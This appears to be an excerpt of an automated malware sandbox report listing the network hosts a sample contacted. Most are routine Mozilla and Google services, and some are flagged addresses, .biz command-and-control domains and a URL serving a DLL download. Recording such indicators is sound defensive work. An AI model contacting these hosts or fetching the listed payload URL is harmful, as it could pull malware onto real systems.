34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
atten-supporse.biz 104.21.64.1 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 142.250.181.100 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.142 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    formy-spill.biz false
      		high
      https://atten-supporse.biz/api false
        		high
        atten-supporse.biz false
          		high
          dwell-exclaim.biz false
            		high
            http://80.82.65.70/dll/download false
              		high